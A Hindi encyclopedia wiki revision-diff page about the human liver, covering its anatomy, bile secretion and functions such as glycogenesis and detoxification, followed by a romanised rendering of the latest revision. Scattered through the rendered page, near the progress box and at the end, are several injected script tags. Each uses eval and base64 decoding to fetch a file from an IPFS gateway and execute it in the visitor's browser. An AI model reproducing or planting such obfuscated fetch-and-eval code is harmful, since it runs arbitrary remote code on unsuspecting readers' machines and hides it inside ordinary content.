Difference between revisions of "यकृत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(7 intermediate revisions by 4 users not shown)
Line 1: Line 1:
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Liver) '''{{PAGENAME}}''' अधिकांश जीव जंतुओं के शरीर का आवश्यक अंग हैं। इस लेख में मानव शरीर से संबंधित उल्लेख है। यकृत मनुष्य के शरीर में पाई जाने वाली सबसे बड़ी तथा महत्वपूर्ण पाचक ग्रन्थि होती है। यह उदरगुहा के दाहिने ऊपरी भाग में [[डायाफ्राम]] के ठीक नीचे स्थित होता है तथा आन्त्रयोजनीयों द्वारा सधा रहता है। यह [[लाल रंग|लाल]]–[[भूरा रंग|भूरे रंग]] का बड़ा, कोमल, ठोस तथा द्विपालित अंग होता है। दोनों पालियाँ बहुभुजीय पिण्डकों से बनी होती हैं। इनके चारों ओर संयोजी ऊतकों का आवरण होता है जिसे ग्लीसन कैप्सूल कहते हैं।  
+
'''यकृत''' ([[अंग्रेज़ी भाषा|अंग्रेज़ी]]: ''Liver'') अधिकांश जीव जंतुओं के शरीर का आवश्यक अंग हैं। यह मनुष्य के शरीर में पाई जाने वाली सबसे बड़ी तथा महत्त्वपूर्ण पाचक ग्रन्थि होती है। यह उदरगुहा के दाहिने ऊपरी भाग में [[डायाफ्राम]] के ठीक नीचे स्थित होता है तथा आन्त्रयोजनीयों द्वारा सधा रहता है। यह [[लाल रंग|लाल]]–[[भूरा रंग|भूरे रंग]] का बड़ा, कोमल, ठोस तथा द्विपालित अंग होता है। दोनों पालियाँ बहुभुजीय पिण्डकों से बनी होती हैं। इनके चारों ओर [[संयोजी ऊतक|संयोजी ऊतकों]] का आवरण होता है जिसे ग्लीसन कैप्सूल कहते हैं।  
 
+
==पित्त का स्रावण==
यकृत पिण्डक यकृत [[कोशिका]]ओं से बने होते हैं, इनसे पित्त का स्रावण होता है। पित्त पित्ताशय में संग्रहित होता रहता है। पित्त में पाचक [[एन्जाइम]] नहीं पाए जाते हैं, लेकिन यह फिर भी पाचन में सहायता करता है।  
+
[[मानव शरीर|मानव के शरीर]] में यकृत द्वारा [[पित्त]] का सतत उत्पादन होता रहता है, जो पित्ताशय में एकत्र होता रहता है। इसका pH मान 7.7 होता है। यकृत पिण्डक, यकृत [[कोशिका]]ओं से बने होते हैं, इनसे पित्त का स्रावण होता है। पित्त पित्ताशय में संग्रहित होता रहता है। पित्त में पाचक [[एन्जाइम]] नहीं पाए जाते हैं, लेकिन यह फिर भी पाचन में सहायता करता है।
 
 
 
==यकृत के कार्य==
 
==यकृत के कार्य==
यकृत के निम्नलिखित महत्वपूर्ण कार्य हैं-
+
यकृत के निम्नलिखित महत्त्वपूर्ण कार्य हैं-
 
 
 
* '''पित्त रस का स्रावण'''- यकृत पित्त रस का स्रावण करता है। इसकी प्रकृति क्षारीय होती है। इसमें पित्त [[लवण (रसायन विज्ञान)|लवण]], कोलेस्ट्राल, वर्णक कोशिकाएँ पाई जाती हैं।  
 
* '''पित्त रस का स्रावण'''- यकृत पित्त रस का स्रावण करता है। इसकी प्रकृति क्षारीय होती है। इसमें पित्त [[लवण (रसायन विज्ञान)|लवण]], कोलेस्ट्राल, वर्णक कोशिकाएँ पाई जाती हैं।  
 
** भोजन के माध्यम को क्षीरीय बनाता है।  
 
** भोजन के माध्यम को क्षीरीय बनाता है।  
Line 12: Line 10:
 
** पित्त वर्णक, लवण आदि [[पदार्थ|पदार्थों]] को उत्सर्जित करता है।   
 
** पित्त वर्णक, लवण आदि [[पदार्थ|पदार्थों]] को उत्सर्जित करता है।   
 
* '''ग्लाइकोजिनेसिस'''- आवश्यकता से अधिक [[ग्लुकोज]] का संचय ग्लाइकोजन के रूप में करता है। यह प्रक्रिया ग्लाइकोजिनेसिस कहलाती है।  
 
* '''ग्लाइकोजिनेसिस'''- आवश्यकता से अधिक [[ग्लुकोज]] का संचय ग्लाइकोजन के रूप में करता है। यह प्रक्रिया ग्लाइकोजिनेसिस कहलाती है।  
* '''ग्लूकोजीनोलाइसिस'''- [[रुधिर]] में ग्लूकोज की मात्रा कम होने पर यकृत कोशिकाएँ ग्लाइकोजन को पुनः ग्लूकोज में बदल देती हैं। यह प्रक्रिया ग्लूकोनियोजिनेसिस कहलाती है।   
+
* '''ग्लूकोजीनोलाइसिस'''- [[रुधिर]] में [[ग्लूकोज़]] की मात्रा कम होने पर यकृत कोशिकाएँ ग्लाइकोजन को पुनः ग्लूकोज़ में बदल देती हैं। यह प्रक्रिया ग्लूकोनियोजिनेसिस कहलाती है।   
* '''ग्लाइकोनियोजिनेसिस'''- आवश्यकता पड़ने पर यकृत कोशिकाओं के द्वारा अमीनों [[अम्ल|अम्लों]] तथा वसीय अम्लों से ग्लूकोज का निर्माण किया जाता है। इस क्रिया को ग्लाइकोनियोजिनेसिस कहते हैं।  
+
* '''ग्लाइकोनियोजिनेसिस'''- आवश्यकता पड़ने पर यकृत कोशिकाओं के द्वारा अमीनों [[अम्ल|अम्लों]] तथा वसीय अम्लों से ग्लूकोज़ का निर्माण किया जाता है। इस क्रिया को ग्लाइकोनियोजिनेसिस कहते हैं।  
 
* '''वसा एवं विटामिन्स का संश्लेषण'''- यकृत कोशिकाएँ वसा तथा [[विटामिन|विटामिन्स]] का संश्लेषण एवं संचय का कार्य करती है।  
 
* '''वसा एवं विटामिन्स का संश्लेषण'''- यकृत कोशिकाएँ वसा तथा [[विटामिन|विटामिन्स]] का संश्लेषण एवं संचय का कार्य करती है।  
 
* '''एन्जाइम का स्राव करना'''  
 
* '''एन्जाइम का स्राव करना'''  
Line 27: Line 25:
 
* '''जीवाणुओं का भक्षण'''  
 
* '''जीवाणुओं का भक्षण'''  
 
* '''लसीका उत्पादन, संचय'''
 
* '''लसीका उत्पादन, संचय'''
{{लेख प्रगति
+
{{साँचा:मानव शरीर2}}
|आधार=
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2|माध्यमिक=|पूर्णता=|शोध=}}
|प्रारम्भिक=प्रारम्भिक2
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{मानव शरीर}}
 
{{मानव शरीर}}
[[Category:जीव विज्ञान]]
+
[[Category:जीव विज्ञान]][[Category:विज्ञान कोश]][[Category:मानव शरीर]]
[[Category:विज्ञान कोश]]
 
[[Category:मानव शरीर]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 11:03, 18 May 2020

yakrit (aangrezi: Liver) adhikaansh jiv jantuoan ke sharir ka avashyak aang haian. yah manushy ke sharir mean paee jane vali sabase b di tatha mahattvapoorn pachak granthi hoti hai. yah udaraguha ke dahine oopari bhag mean dayaphram ke thik niche sthit hota hai tatha antrayojaniyoan dvara sadha rahata hai. yah lalbhoore rang ka b da, komal, thos tatha dvipalit aang hota hai. donoan paliyaan bahubhujiy pindakoan se bani hoti haian. inake charoan or sanyoji ootakoan ka avaran hota hai jise glisan kaipsool kahate haian.

pitt ka sravan

manav ke sharir mean yakrit dvara pitt ka satat utpadan hota rahata hai, jo pittashay mean ekatr hota rahata hai. isaka pH man 7.7 hota hai. yakrit pindak, yakrit koshikaoan se bane hote haian, inase pitt ka sravan hota hai. pitt pittashay mean sangrahit hota rahata hai. pitt mean pachak enjaim nahian pae jate haian, lekin yah phir bhi pachan mean sahayata karata hai.

yakrit ke kary

yakrit ke nimnalikhit mahattvapoorn kary haian-

  • pitt ras ka sravan- yakrit pitt ras ka sravan karata hai. isaki prakriti kshariy hoti hai. isamean pitt lavan, kolestral, varnak koshikaean paee jati haian.
    • bhojan ke madhyam ko kshiriy banata hai.
    • vasa ka imalsikaran karata hai.
    • hanikarak jivanuoan ko nasht karake bhojan ko s dane se bachata hai.
    • pitt varnak, lavan adi padarthoan ko utsarjit karata hai.
  • glaikojinesis- avashyakata se adhik glukoj ka sanchay glaikojan ke roop mean karata hai. yah prakriya glaikojinesis kahalati hai.
  • glookojinolaisis- rudhir mean glookoz ki matra kam hone par yakrit koshikaean glaikojan ko punah glookoz mean badal deti haian. yah prakriya glookoniyojinesis kahalati hai.
  • glaikoniyojinesis- avashyakata p dane par yakrit koshikaoan ke dvara aminoan amloan tatha vasiy amloan se glookoz ka nirman kiya jata hai. is kriya ko glaikoniyojinesis kahate haian.
  • vasa evan vitamins ka sanshleshan- yakrit koshikaean vasa tatha vitamins ka sanshleshan evan sanchay ka kary karati hai.
  • enjaim ka srav karana
  • vitamins ka sanchay
  • diemineshan
  • yooriya ka sanshleshan
  • utsarji padartho ka nishkasan
  • vishakt padarthoan ka vishaharan
  • rudhiranuoan ka nirman ek vikhandan
  • akarbanik padarthoan ka sanshleshan
  • rudhir protin ka sanshleshan
  • hipairin ka sravan
  • jivanuoan ka bhakshan
  • lasika utpadan, sanchay

Template:saancha:manav sharir2

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>